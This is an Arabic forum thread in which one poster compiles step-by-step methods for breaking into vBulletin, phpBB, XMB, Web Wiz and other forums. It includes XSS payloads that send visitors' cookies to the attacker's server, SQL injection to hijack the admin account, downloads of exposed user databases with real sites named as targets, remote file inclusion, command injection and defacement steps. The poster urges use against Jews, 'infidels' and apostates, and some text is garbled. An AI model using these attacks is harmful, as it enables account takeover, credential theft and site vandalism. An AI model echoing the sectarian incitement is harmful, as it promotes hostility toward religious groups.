صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 10 من 14

الموضوع: اغلب طرق اختراق المنتديات

بسم الله الرحمن الرحيم السلام عليكم ورحمة الله وبركاته الحمد لله رب العالمين و أفضل الصلاة و أتم التسليم على سيدنا محمد صلى الله عليه وعلى آله وصحبه أجمعين أما

  1. #1
    islamm2003 غير متصل [ جـديــد ]
    تاريخ التسجيل
    Mar 2005
    المشاركات
    13

    اغلب طرق اختراق المنتديات

    hygf 'vr hojvhr hglkj]dhj 27 1111243169 بسم الله الرحمن الرحيم
    السلام عليكم ورحمة الله وبركاته
    الحمدَ لله رب العالمين و أفضل الصلآة و اتم التسليم علي سيدنا محمدَ صلي الله عَليه وعلي اله وصحبه اجمعين اما بَعد:
    السلام عليكم ورحمة الله وبركاته
    هَذا الموضوع يحتَوي علي معلومات كثِيرة ومفيدة لكُل الهاكرز وبجميع مستوياتهم فارجوا منكم ان لا تستخدموا هَذه المعلومات فِي مضرة المسلمين و ايذاءَ اخوانكم فِي الدين
    ولكن ارجوا ان تستخدموها ضدَ اليهودَ وكفار و الرتدين

    اولا سم بالله وابدا
    بسم الله الرحمن الرحيم


    جميع طرق اختراق المنتديات


    --------
    مقدمة
    --------

    الموضوع اختراق ال vBulletin
    المتطلبات WebServer تركيب سيرفر علي جهازك الشخصي متصفح انترنت اكسبلورر

    المستوي متوسط

    ملاحظة هَذه الطريقَة ليست لل vBulletin فَقط يُمكن ان تجربها علي انواع اخري مِن المنتديات



    ---------
    الثغرة
    --------

    تنقسم طريقَة العمل الي عدة اقسام

    اولا بَعض السكربتات الخبيثة الَّتِي تسرق الكوكيز بالاضافة الي جعل المنتدى يستقبل
    بيانات مِن مكان خاطيء

    لكن يشترط ان يسمح المنتدى باكوادَ ال HTML



    قم بكتابة موضوع جديدَ أو ردَ فِي منتدى يدعم ال HTML

    ثم اكتب أي موضوع والصق بَين السطور هَذا الكودَ
    <script>document.write('<img
    src="http://my_ip_address/'+document.cookie+'">';</script>

    مع ملاحظة تغير ال IP Adress الي رقم ال IP الخاص بك


    وعندما يقُوم شَخص ما بقراءة محتَوي الصفحة فإن السكربت الَّذِي قمنا بوضعه سيقُوم بتنفيذ الاوامر فِي جهاز وقراءة جُزء
    من أحدَ ملفات الكوكيز الَّتِي تَحْتوي علي الباسوردَ الخاصة بالمنتدى

    ثم يقُوم السكربت بتحويل هَذه السطور الي رقم
    الاي بي الَّذِي قمنا بكتابته سابقا مَع ملاحظة أنه يَجب ان يَكون علي جهازي سيرفر مِثل IIS أو Apache أو غَيرها


    وبعدَ ان تتم العملية بنجاح قم بفَتح ملف ال Log الخاص بالسيرفر الَّذِي يحتويه جهازك


    مثال لَو كَان السيرفر اباتشي

    فتاح المجلدَ Apche واختر logs واختر Acces Log

    ستجدَ جميع الاوامر الَّتِي طلبتها مِن السيرفر

    الخ

    ابحث عَن الكودَ الخاص بالباسورد

    مثال

    GET/ bbuserid=86;%20bbpassword=dd6اغلب اختراق المنتديات smilies69d68822aاغلب اختراق المنتديات smiliesاغلب اختراق المنتديات smilies6cd97eاغلب اختراق المنتديات smiliesfb

    ddf90622;%20sessionhash=a
    47اغلب اختراق المنتديات smilies9cd6205349اغلب اختراق المنتديات smilies4930b86839c4bb5f8;%20bbthreadview[54
    بسم الله الرحمن الرحيم
    السلام عليكم ورحمة الله وبركاته
    الحمدَ لله رب العالمين و أفضل الصلآة و اتم التسليم علي سيدنا محمدَ صلي الله عَليه وعلي اله وصحبه اجمعين اما بَعد:
    السلام عليكم ورحمة الله وبركاته
    هَذا الموضوع يحتَوي علي معلومات كثِيرة ومفيدة لكُل الهاكرز وبجميع مستوياتهم فارجوا منكم ان لا تستخدموا هَذه المعلومات فِي مضرة المسلمين و ايذاءَ اخوانكم فِي الدين
    ولكن ارجوا ان تستخدموها ضدَ اليهودَ وكفار و الرتدين

    اولا سم بالله وابدا
    بسم الله الرحمن الرحيم


    جميع طرق اختراق المنتديات


    --------
    مقدمة
    --------

    الموضوع اختراق ال vBulletin
    المتطلبات WebServer تركيب سيرفر علي جهازك الشخصي متصفح انترنت اكسبلورر

    المستوي متوسط

    ملاحظة هَذه الطريقَة ليست لل vBulletin فَقط يُمكن ان تجربها علي انواع اخري مِن المنتديات



    ---------
    الثغرة
    --------

    تنقسم طريقَة العمل الي عدة اقسام

    اولا بَعض السكربتات الخبيثة الَّتِي تسرق الكوكيز بالاضافة الي جعل المنتدى يستقبل
    بيانات مِن مكان خاطيء

    لكن يشترط ان يسمح المنتدى باكوادَ ال HTML



    قم بكتابة موضوع جديدَ أو ردَ فِي منتدى يدعم ال HTML

    ثم اكتب أي موضوع والصق بَين السطور هَذا الكودَ
    <script>document.write('<img
    src="http://my_ip_address/'+document.cookie+'">';</script>

    مع ملاحظة تغير ال IP Adress الي رقم ال IP الخاص بك


    وعندما يقُوم شَخص ما بقراءة محتَوي الصفحة فإن السكربت الَّذِي قمنا بوضعه سيقُوم بتنفيذ الاوامر فِي جهاز وقراءة جُزء
    من أحدَ ملفات الكوكيز الَّتِي تَحْتوي علي الباسوردَ الخاصة بالمنتدى

    ثم يقُوم السكربت بتحويل هَذه السطور الي رقم
    الاي بي الَّذِي قمنا بكتابته سابقا مَع ملاحظة أنه يَجب ان يَكون علي جهازي سيرفر مِثل IIS أو Apache أو غَيرها


    وبعدَ ان تتم العملية بنجاح قم بفَتح ملف ال Log الخاص بالسيرفر الَّذِي يحتويه جهازك


    مثال لَو كَان السيرفر اباتشي

    فتاح المجلدَ Apche واختر logs واختر Acces Log

    ستجدَ جميع الاوامر الَّتِي طلبتها مِن السيرفر

    الخ

    ابحث عَن الكودَ الخاص بالباسورد

    مثال

    GET/ bbuserid=86;%20bbpassword=dd6اغلب اختراق المنتديات smilies69d68822aاغلب اختراق المنتديات smiliesاغلب اختراق المنتديات smilies6cd97eاغلب اختراق المنتديات smiliesfb








    ddf90622;%20sessionhash=a
    47اغلب اختراق المنتديات smilies9cd6205349اغلب اختراق المنتديات smilies4930b86839c4bb5f8;%20bbthreadview[54








    20]=اغلب اختراق المنتديات smilies0اغلب اختراق المنتديات smilies2444064;%20bblastvi
    sit=اغلب اختراق المنتديات smilies0اغلب اختراق المنتديات smiliesاغلب اختراق المنتديات smilies983اغلب اختراق المنتديات smilies6اغلب اختراق المنتديات smilies

    فكر قلِيلا الان

    اين الباسوردَ
    الباسوردَ موجودة لكِن بطريقَة مشفرة يصعب كسرها

    اذن مالحل
    قم بنسخ الكودَ الَّذِي وجدته والصقه فِي المتصفح

    بهَذا الشَكل
    http://www.victim.com/vb/index.php?bbuserid=[userid]&bbpassword=[password hash]
    ستجدَ عبارة " اهلا بعودتك يا اسم الَّذِي سرقت مِنه الكوكيز.... "
    في هَذه الحالة أنت الآن تستطيع التحكم بِكُل شَي وكانك مدير المنتدى الَّذِي سرقت مِنه الكوكيز)


    لكننا نحتاج الي كلمة المرور للدخول الي لوحة التحكم

    اذهب الي التحكم وقم بتعديل البريدَ الالكتروني الي بريدك الخاص
    وثم قم بتسجيل الخروج

    ثم اذهب الي ادآة Forgot Password

    وعندها تستطيع استقبال بريدَ يحتَوي باسوردَ الادمن



    اعتقدَ انك تعلم ما يَجب ان تفعله بَعدَ ذلِك ادخل الي لوحة التحكم وافعل ما تشاء



    -----------
    الحل
    ----------

    للحماية مِن هَذه الثغرة قم بإغلاق ال HTML فِي المنتدى الرسائل الخاصة التواقيع التقويم
    .

    (واي منفذ يُمكن مِن خِلاله وَضع كودَ HTML باي صورة كَانت

    كَما يَجب اغلا كودَ ال IMG

    لانه ببساطة بامكانك استخدامه بدل كلمة <script> فاذا وَضعت <img> أو <Demon> أو
    اي كلمة اخري فانه سيتِم تنفيذ السكربت بشَكل أو باخر
    .
    لذا كن حذرا واغلق هَذه المنافذ

    Be Secret

    Dont' be Lamer


    تاريخ اكتشاف الثغرة 3اغلب اختراق المنتديات smilies اغلب اختراق المنتديات smilies 2002
    تم تجربتها علي الاصدار 2.2.0 وهي تعمل بنجاح



    ارجو ان تستخدموا هَذه الطريقَة ضدَ العدو والا تستخدموها ضدَ اخوانكم العرب والمسلمين



    ======================================
    اختراق منتديات VP
    ======================================
    اختراق المنتديات بس بمنتديات vb


    قم بالتسجيل كعضو مَع مراعآة التسجيل ببريدَ حقيقي

    2
    تدخل المنتدى كعضو باسم المستخدم وكلمة السر الخاصة بك

    3
    اضغط علي زر الاعضاءَ الموجودَ بالاعلي أو members


    او العنوان التفصيلي التالي
    http://URL/memberlist.php

    URL = العنوان المستضيف للمنتدى

    مثل =
    com

    4
    اضغط علي أي مستخدم مِن المستخدمين عشوائيا وستلاحظ ظهور عنوان طويل بالاعلي فِي مستطيل العناوين address bar


    سيظهر لك عنوان يحمل ارقاما واحرفا عشوائية كالشَكل التالي

    http://URL/member.php?soitgoe68e45u...info&userid=266

    هَذا العنوان الطويل يَعني = عرض بيانات المستخدم رقم 266

    5
    بكل بساطة غَير الرقم مِن 266 الي الرقم واحدَ هكذا

    http://URL/member.php?soitgoe68e45u...etinfo&userid=اغلب اختراق المنتديات smilies

    العضو رقم واحدَ عادة وافتراضيا يَكون هُو المدير للمنتدى administrator


    (((== ها أنت تجتاز الخطوة الاولي بنجاح وتعرف مِن هُو المدير للموقع ==

    احفظ اسم المدير حيثُ انك ستحتاجه بالخطوة التالية

    6
    اكتب العنوان التالي مَع تغيير المتغييرات الَّتِي ساذكرها

    http://URL/member.php?action=login&...VALIDPASS&url=');'.$use rs=$DB_site->query('update+user+set+email='YOUR@EMAIL.HERE'+WH E RE+username='ADMIN'').'

    العنوان هَذا ستَقوم بتغيير الكلمات التالية

    URL = كَما ذكرنا سابقا الموقع المستضيف للمنتدى
    VALIDUSER = اسم المستخدم الخاص بك
    VALIDPASS = كلمة السر الخاصة بك
    [email]YOUR@EMAIL.HERE[/email] = البريدَ الَّذِي سجلت بِه بالمنتدى
    ADMIN = اسم مدير المنتدى الَّذِي اكتفشته بالخطوة السابقة

    7
    بعدَ ان تغيير جميع ما سبق وتتاكدَ مِنه تَقوم بعمل انعاشَ للمنتدى عدة مرات refresh


    8
    ثم ترجع لصفحة المنتدى الرئيسية
    http://url/index.php

    ثم حاول الدخول باستخدام اسم المستخدم الخاص بك وإستعمال كلمة سر خاطئة يَجب ان تَكون خاطئة


    بالطيع ستظهر لك الصفحة التعيسة الَّتِي تقول

    انت قمت بكتابة كلمة سر خاطئة

    you typed in the wrong password

  2. #2
    islamm2003 غير متصل [ جـديــد ]
    تاريخ التسجيل
    Mar 2005
    المشاركات
    13
    9
    بكل بساطة اضغط علي

    نسيت كلمة السر
    forgot password

    والَّتِي ستَقوم بارسال كلمة السر الي بريدك الالكتروني

    0
    افَتح بريدك وستجدَ كلمة السر الخاصة بمدير المنتدى

    ملاحظة هَذه الطريقَة قديمة واغلب المنتديات قاموا بإغلاق هَذه الثغرة يَعني لا تستطيع فعلها الا مَع منتديات اليوم

    ======================================
    اختراق منتديات xmb
    ======================================
    تعتبر المنتديات مِن نوع xmb مِن المنتديات الَّتِي اكتيبت شَهره واسعه فِي مجالها وحالها حال الكثير مِن الانواع الاخري مِن المنتديات مِن وجودَ الثغرات والاختراقات فلا يُوجدَ شَيء كامل علي وجه الارض الا الله عز وجل.


    وصف للثغره::
    وقدَ تم اكتشاف ثغره جديده فِي هَذا النوع مِن المنتديات مما يُمكنك ان تَكون المدير علي المنتدى أو تَكون مشرف اوي أي عضو آخر

    الاصدار المصاب:::
    XMB .6 Magic Lantern Final

    الشرح والتطبيق:::
    جاءَ وقْت الشغل والجد<<< سوفَ اقوم بتقسيم الدرس علي خطوات حتّى يفهم ويَكون اووضح واسهل:

    عليك بالذهاب الي موقع جوجل http://www.google.com
    2 اكتب فِي منطقة البحث XMB .6 Magic Lantern Final
    3 سوفَ تري منتديات كثييييييره أكثرها مصابه بهَذه الثغره لكِن رجااءَ
    لاتقرب المنتديات العربية وعليك بتحذيرها مِن الثغره الموجوده

    4 اضغط علي أي منتدى وقم بكتابة الكلمة التالية بَعدَ عنوان المنتدى
    index_log.log يَعني راح يَكون متل هدا
    http://www.******.com/massegboard/index_log.log
    5 راح ينزل عندك ملف والملف عباره عَن ملف مِثل الكوكيز كبير وفيه اسماءَ
    المستخدمين والباسوردَ واشياءَ ثانيه ماتهمنا

    6 الآن عليك بالبحث فِي المنتدى عَن اسم المدير وذلِك بالذهاب الي المواضيع
    وتشوف الاسماءَ والي تلقي تَحْت اسمه ادمن ستريتور انسخ اسمه

    7 افَتح الملف الي نزلته مِن الموقع وسوي بحث عَن اسم المدير راح يجيك متل
    هَذا مِثلا::
    xmbuser=admin
    واباس راح تلقاه قدامه مِثل هَذا
    xmbpw=faeb6747a3c854800ddf3c62b77a
    8 طبعا الباس فِي هَذه الحاله مشفر وفك التشفير صعب لهَذا الغرض قامت شَركة
    CCI بتصميم برنامج يقُوم بهَذا الغرض وهَذه وصلت البرنامج
    ftp://www.cafecounterintelligence.com/cci/chigger.exe


    ======================================
    اختراق منتديات Web Wiz Guide
    ======================================
    مثال:http://host.basharnet.com/forum
    هَذه الطريقَة اقدمها لكُل الهاكرز المبتدئين لأنها سهلة جداً وما بدا غَير تحمل هالملف وتتصفح الباسووردَ علي كَيفيك دَون تشفير يَعني إذا كنت ما بتعرف شَي عَن الهاكر بقرائتك لهَذه الثغرة تستطيع ان تخترق منتدى
    اغلب المنتديات مصابة بهَذه الثغرة


    بسم الله الرحمن الرحيم

    الشرح: ثغرة تصيب منتديات Web Wiz Guide

    اولا اذهب الي google
    اكتب
    Web Wiz forum

    وانتظر لحدَ ماتطلع لك المواقع الي تدعم هَذا المنتدى ادخل المنتدى واكتب بَعدَ forum
    admin/wwforum.mdb

    حمل الملف وادخل عَليه عَن طريق microsoft office access

    بعدَ ماتاخذ باسووردَ المشرف العام اذهب الي admin

    سجل اسمك والباسووردَ

    الآن أنت فِي لوحة التحكم
    ها ها ها ها
    بس ما حدا يخترق المنتديات الوجودة فِي محرك البحث قوقل الَّتِي قمت باختراقها انا
    هَذا منتدى قمت باختراقه لاحقا
    http://www.plasticcube.com/Forum/default.asp
    اكتبوا فيه ما تشائون يا اعضاءَ وزوار منتديا عرب للابد
    وهي منندي ثان
    هَذا منتدى دَينيماركي
    http://www.naturklub.dk/forum/


    ثغرة فِي معظم منتديات ال asp

    +++++++++++++++++++++++++
    ساذكر أحدَ الثغرات فِي بَعض اللغات الديناميكية(asp active server pages
    وعَليها فقس
    طبعا هَذه اللغة وللاسف بها ثغرات قوية جداً وخصوصا فِي التعامل مَع قواعدَ بياناتها


    بشَكل مختصر هَذه اللغة تعتبر مِن لغات البرمجة الديناميكية التفاعلية لبرمجة مواقع الانترنت ولها ميزة بان الكودَ لَها مخفي والكثير مِن الناس يفضلونها لأنها مدعومة مِن ما يكروسوفت علي عكْس وجهة نظري لاني ما اطيق أي برنامج مِن ما يكروسوفت الا إذا لَم يُوجدَ لَه بديل
    ..الخ
    وتعتمدَ قواعدَ بياناتها علي ثلاثة انواع هِي
    sqlserver && sql && M.S Access

    واما قاعدة بيانات ما يكروسوفت اكسس فثغراتها مِن ابسط الثغرات بحيثُ انك إذا وجدت امتدادا واسم قاعدة البانات فَقط فانك تستطيع تحميلها علي جهازك مباشرة وتصفح جميع الباسوردات بسهولة ويسر وبدون تشفير أيضا


    واليكم المثال مِن أحدَ المنتديات الَّتِي تتضح جليه بها هَذه الثغرة وهي باسم philboard.asp
    مثل هَذا المنتدى http://www.khill.co.uk/forum/philboard.asp
    وطريقَة ايجادَ مِثل هَذا النوع منتديات اذهب الي جوجل كَما ذكرنا سابقا وابحث عَن ------------ > philboard وانتظر النتائج
    ..


    -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
    كيف تحمل قاعدة البيانات
    اكتب هَذا الامتدادَ
    وبعدَ ذلِك حاول ان يَكون المنتدى بِه عديدَ قلِيل مِن المواضيع حتّى يَكون حجْم قاعدة البيانات صغير جداً للتطبيق والتسليم بسرعة
    وهَذا هُو امتدادَ واسم قاعدة البيانات لقاعدة البيانات
    database/philboard.mdb
    وتكتبه بَعدَ اسم الموقع والمنتدى مِثل
    http://www.khill.co.uk/forum/database/philboard.mdb

    ولا بدَ لكي تقرا قاعدة البيانات ان يَكون فِي جهازك برنامج ما يكروسوفت اكسس
    وبعدَ فَتح قاعدة البيانات ستجدَ بداخلها عدة جداول فيها جميع محتويات قاعدة البيانات
    من ضمِنها وهو المهم جدول المستخدمين ال users
    وستجدَ أول اسم عالبا هُو admin وهو اسم المدير العام مَع الباسووردَ

    الآن وبعدَ ان حصلنا علي الاسم والباسووردَ ماذَا تبقي
    لم يبقي الي الدخول للوحة التحكم للمنتدى للتحكم فيه وكانك المشرف العام

    philboard_admin.asp وهَذا عنوأنها
    مثال
    http://www.khill.co.uk/forum/philboard_admin.asp

    ادخل وستجدَ كُل منتدى وبجانبة كلمه delete و edit
    احذف كُل المنتديات وانشا منتديات جديدة واكتب عَليها
    hacked by xxxxxxxxxx
    xxxxxxx يَعني اسمك
    ,,

    من وين

    من المربعين الموجودة بالاسفل فِي لوحة التحكم
    اكتب فِي المستطيل hacked by xxxxxxxxxx
    وفي المربع الي اسفله ضَع رسالة تودَ توجيهها لاصحاب الموقع
    واضغط add يَعني اضافة

    ومبرووووووووووووووووووووووك الف مبروووووووك أول اختراق لك

    والحل لهَذه الثغرة / هُو تغيير مسار قواعدَ البيانات لكُل منتدى أو تغيير اسمها
    فكَما راينا ان منتديات philboard.asp قواعدَ بياناتها جميعا لَها نفْس الاسم والامتداد

    _________________________________________________

    تفضلو ثغرة فِي هاك الردَ السريع منتدى PHPBB

    عِندَ تركيبك لهاك الردَ السريع
    سوفَ تجدَ هَذا الكودَ


    if mode == 'smilies'

    define('IN_PHPBB', true);
    include($phpbb_root_path
    'extension.inc');
    include($phpbb_root_path
    'common.'.$phpEx);
    include($phpbb_root_path
    'includes/functions_post.'.$phpEx);
    generate_smilies('window', PAGE_POSTING);
    exit;
    -



    دقق جيدا بهَذا الكودَ
    ثم انشاءَ ملف جديدَ سمه extension.inc

    وضع دَاخِلها مِثلا
    شفرة

    <?php
    include('config'.'.php');
    echo "DB Type: dbms <br>";
    echo "DB Host: dbhost <br>";
    echo "DB Name: dbname <br>";
    echo "DB User: dbuser <br>";
    echo "DB Pass: dbpasswd <br>";
    exit;
    ?>

  3. #3
    islamm2003 غير متصل [ جـديــد ]
    تاريخ التسجيل
    Mar 2005
    المشاركات
    13
    يمكنك وض الخيارات الَّتِي تودَ مشاهدتها مِن الهاك

    الآن وبكل سهولة بَعدَ تنزيل extension.inc الي موقع يدعم البي اتشَ بي
    اتجه الي هَذا العنوان

    URL: http://[phpBB_Forum]/quick_reply.php?phpbb_root_path=http://[Your Server]/&mode=smiles

    بسهولة استبدل
    [phpBB_Forum]
    بعنوان المنتدى المستهدف
    [Your Server]
    بعنوان الموقع الَّذِي قمت بوضع الملف اللذي انشائناه بِه

    ماذَا ترى؟؟
    معلومات قاعدة البيانات بَين ايديك

    الحل لهَذه الثغرة الخطيرة والَّتِي شَردت الكثير مِن المنتديات

    ببساطة افَتح الملف quick_reply.php
    ابحث عَن
    if mode == 'smilies'
    اضف بَعدها مباشرة
    phpbb_root_path = "./";

    وانشاءالله انحلت المشكلة


    _________________




    ثغره جديده فِي منتديات الvb
    ________________________
    ارجوا عدَم استخدام الثغرة علي المسلمين وفيما يظر بالاسلام وفيما حرمه الله

    لكن هذي كَانت علي النسخة التجريبية Beta

    بالنسبة للثغرة فَهي واضحة
    وهي تستغل عَن طريق الرسائل private.php وتَقوم بسرقة الكوكيز ولكن بشرط يَكون مفعل كودَ الهتمل فِي المنتدى وصاحب الثغرة يذكر أنه قَدَ يَكون مِن الضروري تسجيل الدخول لك

    طبعا استغلالها عَن طريق تحويل الكودَ لملف html مَع تغيير اسم الموقع ومجلدَ المنتدى
    http://[victim]/forum/private.php




    PHP:

    -------------------------------------------------------------------------------


    From: Ferruh Mavituna
    Subject: VBulletin Preview Message&nbs
    p; XSS Vuln


    --------------------------------------
    --------------
    VBulletin Private Message&nbs
    p;"Preview
    Message" XSS Vulnerability
    --------------------------------------
    --------------
    Any kind of XSS att
    acks possibility


    ----------------------------------------------------

    About VBulletin;
    ----------------------------------------------------

    PHP Based Popular Forum&
    nbsp;Application
    Vendor & Demo;
    <a href="http://www.vbulletin.com/" target="_blank"><a href="http://www.vbulletin.com/" target="_blank">http://www.vbulletin.com/</a></a>

    --------------------------------------
    --------------
    Vulnerable;
    ----------------------------------------------------

    vBulletin 3.0.0 Beta 2
    <
    br />vBulletin 2.x
    --------------------------------------
    --------------

    ----------------------------------------------------

    Vendor Status;
    ----------------------------------------------------

    I can not contact v
    endor for this issue No patch available at&nb
    sp;the moment;

    ----------------------------------------------------

    Solution;
    ----------------------------------------------------

    HTML Encoding like post&
    nbsp;thread preview page;

    ----------------------------------------------------

    Exploit Code;
    ----------------------------------------------------

    <html>
    <body>
    <form action="http://[victim]/forum/private.php"&nbs
    p;method="post"
    name="vbform">
    <input type="hidden" name="do" value="insertpm" />
    <input type="hidden" name="pmid" value="" />
    <input type="hidden" name="forward" value="" />
    <input type="hidden" name="receipt" value="0" />

    <input type="text" class="bginput" name="title" value="" size="40"
    tabindex="2" />
    <textarea name="message" rows="20" cols="70" wrap="virtual"
    tabindex="3"></textarea>
    <input type="submit" class="button" name="sbutton" value="Post
    Message"
    accesskey="s" tabindex="4" />
    <input type="submit" class="button" value="Preview
    Message" accesskey="p"
    name="preview" onclick="this.form.dopreview = true; return
    true;this.form.submit()" tabindex="5" >

    <input type="checkbox" name="savecopy" value="" id="cb_savecopy"
    checked="checked" />
    <input type="checkbox" name="signature" value="" id="cb_signature" />
    <input type="checkbox" name="parseurl" value="" id="cb_parseurl"
    checked="checked" />
    <input type="checkbox" name="disablesmilies" value=""
    id="cb_disablesmilies" />
    </form>
    <script>
    //Set Values and Submit
    // You
    can write your own JS codes
    var xss = "--"><script>alert(document.coo
    kie)</script>";
    document.vbform.title.value=xss;
    document.vbform.preview.click();
    </script>
    </body>
    </html>


    *You may need login first


    Ferruh Mavituna
    Web Application Security
    Consultant
    Freelance Developer & Designer
    <a href="http://ferruh.mavituna.com"
    target="_blank"><a href="http://ferruh.mavituna.com" target="_blank">http://ferruh.mavituna.com</a></a>

    fares25@hotmail.com


    --------------------------------------------------------------------------------

    ثغره جميله لاختراق منتيات الفورم
    ____________________________
    طبعا تعتمدَ علي تَحميل قاعده البيانات مِن الموقع





    وامتدادها تَكون



    admin/wwforum.mdb

    www.###.com/forum
    تصبح



    www.###.com/forum/admin/wwforum.mdb



    طريقَة البحث عَن الثغره




    www.google.com
    وتبحث عَن
    Web Wiz forum

    ويمكنك كتابه
    Web Wiz forum
    Web Wiz forum 2.

    _________________________________________________
    ___________
    ثغرة فِي منتديات vBulletin فِي ملفcalendar.php

    تاكدَ مِن وجودَ ملف calendar.php
    اذا كَان موجودَ ادخل هَذا العنوان
    http://www.example.com/vb/calendar....mma=%22;echo%20'';%20echo%20%60<comman d>%20%60;die();echo%22
    المتغيرات
    -example.com باسم الموقع
    2-<command> باي امر لينكس مثا لامر الباسووردَ pwd



    ______________________________________________
    ثغرة vBulletin
    -------------------------------------------------------------------
    Within the first few lines of code in memberlist.php, the variable letterbits is evaluated
    Because of the way PHP initializes variables, we can inject HTML or JavaScript into the document
    So by directing a user to, for example:

    http://vulnerable/forum/memberlist....Elocation%3D%27
    http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord


    2Ephp%3Fcook%3D%27%2B
    escape%28document%2Ecookie%29%3C%2Fscript%3E
    (NOTE: The URL should be on a one line

    You can steal the user's password hash and user id
    Because of the way vBulletin parses URLs, the above will not function inside the forum, but if we put this in an off-site html file:
    <script>
    location = "http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3Elocation%3D
    %27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Freco


    rd%2Ephp%3Fcook%3D%27
    %2Bescape%28document%2Ecookie%29%3C%2Fscript%3E"
    </script>
    And then link to it instead, the exploit will work as intended
    The user doesn't even have to be aware of what has transpired, the above link will proceed first to the memberlist w/cookie stealing code, and then to http://www.swgmotu.com


    With the recorded user id and password hash, we can access the site:
    http://www.vbulletin.com/forum/index.php?bbuserid=[userid]&bbpassword=[password hash]
    -----------------------------------------------------------------------------------

  4. #4
    islamm2003 غير متصل [ جـديــد ]
    تاريخ التسجيل
    Mar 2005
    المشاركات
    13
    ث
    _________________
    اختراق منتديات vbzoom
    ------------------------------------------------
    السلام عليكم
    شباب أنا اقدم لكُم أهم ثغره معي الشرح المفصل
    <form name="f" action="http://www.victim.com/vbzoom/register.php" method="POST">
    <input type="hidden" name="ChangeProfile" value="">
    User Name: <input type="text" name="UserName"><br>
    Password: <input type="text" name="Password"><br>
    Email: <input type="text" name="Email">
    <input type="hidden" name="HomePage" value="lamerZ">
    <input type="hidden" name="VBZooMForumCookiesUserName" value="false">
    <input type="hidden" name="VBZooMForumCookiesUserName" value="false">
    <input type="submit" value="reset password">
    </form


    <form name="f" action="هنا تضع وصله الموقع " method="POST">
    <input type="hidden" name="ChangeProfile" value="">
    User Name: <input type="text" name="UserName"><br>
    Password: <input type="text" name="Password"><br>
    Email: <input type="text" name="Email">
    <input type="hidden" name="HomePage" value="lamerZ">
    <input type="hidden" name="VBZooMForumCookiesUserName" value="false">
    <input type="hidden" name="VBZooMForumCookiesUserName" value="false">
    <input type="submit" value="reset password">
    </form
    وبعدَ ان تحط وصل الموقع
    تسويه فِي صفحه html
    وتكتب اسم الادمين والباسوردَ الجديده وايميل جديدَ
    تحياتي
    _________________


    ثغرة فِي منتديات مِن نوع XMB
    --------------------------------------------------------
    بسم الله الرحمن الرحيم
    طريقَة الاختراق

    ثغرة جديدة فِي منتديات مِن نوع XMB

    الشرح والتطبيق

    عليك بالذهاب الي موقع جوجل http://www.google.com
    2 اكتب فِي منطقة البحث XMB .6 Magic Lantern Final
    3 سوفَ تري منتديات كثييييييره أكثرها مصابه بهَذه الثغره لكِن رجااءَ
    لاتقرب المنتديات العربية وعليك بتحذيرها مِن الثغره الموجوده

    4 اضغط علي أي منتدى وقم بكتابة الكلمة التالية بَعدَ عنوان المنتدى
    index_log.log يَعني راح يَكون زي كده
    http://www.******.com/massegboard/index_log.log
    5 راح ينزل عندك ملف والملف عباره عَن ملف زي الكوكيز كبير وفيه اسماءَ
    المستخدمين والباسوردَ واشياءَ ثانيه ماتهمنا

    6 الآن عليك بالبحث فِي المنتدى عَن اسم المدير وذلِك بالذهاب الي المواضيع
    وتشوف الاسماءَ والي تلقي تَحْت اسمه ادمن ستريتور انسخ اسمه

    7 افَتح الملف الي نزلته مِن الموقع وسوي بحث عَن اسم المدير راح يجيك هيك مِثلا:
    xmbuser=admin
    والباسوردَ راح تلقاه قدامه زي كذه
    xmbpw=faeb6747a3c854800ddf3c62b77a
    8 طبعا الباسوردَ فِي هَذه الحاله مشفر وفك التشفير صعب لهَذا الغرض قامت شَركة
    CCI بتصميم برنامج يقُوم بهَذا الغرض وهَذه وصلت البرنامج
    ftp://www.cafecounterintelligence.com/cci/chigger.exe


    افَتح البرنامج وفي


    رقم قم بوضع علامة صح

    رقم 2 قم بوضع اسم العضو سواءَ مدير أو غَيره
    رقم 3 قم بوضع الباسوردَ المشفر حق العضو أو المدير أو غَيره
    رقم 4 قم بوضع علامة صح

    رقم 5 قم بوضع البروكسي الي تُريده اوالبروكسي حق مزوده الخدمه حقك
    رقم 6 قم بوضع المنفذ حق البروكسي

    0 بقي شَيء واحدَ بَعدَ اتمام الاعدادات حقت البرنامج بقي ان تذهب الي
    المتصفح انترنت اكسبلورر > اضغط بالزر اليمين> الاتصالاات> اعدادات>
    قم بوضع البروكسي هَذا 27.0.0.> والمنفذ 8080
    بَعدَ ذلِك اذهب للمنتدى المستهدف وتجول فيه وكانك المدير تبع المنتدى
    وسوي الي بدك ياه
    ها ها ها ها

    ارجو ان ينال هَذا الدرس اعجابكم
    هَذا الدرس هام جداً جدا

  5. #5
    الناصر غير متصل [ جـديــد ]
    تاريخ التسجيل
    Mar 2005
    المشاركات
    1
    بصراحه سجلت علي شَان المجهودَ هذا
    يعطيك الف الف الف مليون عافيه
    بس بصراحه صعب مره

    ومشكور مَره ثانيه وياليت التواصل بيننا

  6. #6
    الصورة الرمزية الدويله
    الدويله غير متصل [ مـتـمـيـز ]
    تاريخ التسجيل
    Mar 2005
    الدولة
    حيث ماكنت أكون
    المشاركات
    430
    اخوي islamm2003 بارك الله فيك وماقصرت

    مجهودَ تشكر عَليه بصراحه

    لا شَلت يمينك اخي

    مواضيعك متميزه دَائما كتميز صاحبها

    ننتظر المزيد

  7. #7
    ولد الديرة A غير متصل [ نــشـيـط ]
    تاريخ التسجيل
    Mar 2005
    المشاركات
    31
    مشكور اخوي وماقصرت

    علي الموضوع

  8. #8
    الصورة الرمزية ابو فارس
    ابو فارس غير متصل [ جـديــد ]
    تاريخ التسجيل
    May 2008
    الدولة
    السـعـوديـه
    المشاركات
    1

    رد: اغلب طرق اختراق المنتديات

    مشكوور اخوي
    بس اغلب هالثغرات قديمه

    سلمت يالذيب
    ,

  9. #9
    شوشو.... غير متصل [ جـديــد ]
    تاريخ التسجيل
    May 2009
    المشاركات
    4

    رد: اغلب طرق اختراق المنتديات

    يسلموووووووووووو

  10. #10
    wharkkelfrile غير متصل [ جـديــد ]
    تاريخ التسجيل
    Oct 2012
    الدولة
    Bulgaria
    المشاركات
    5

    kredyty chwilowki bez bik Information Close to Verification on your Worker

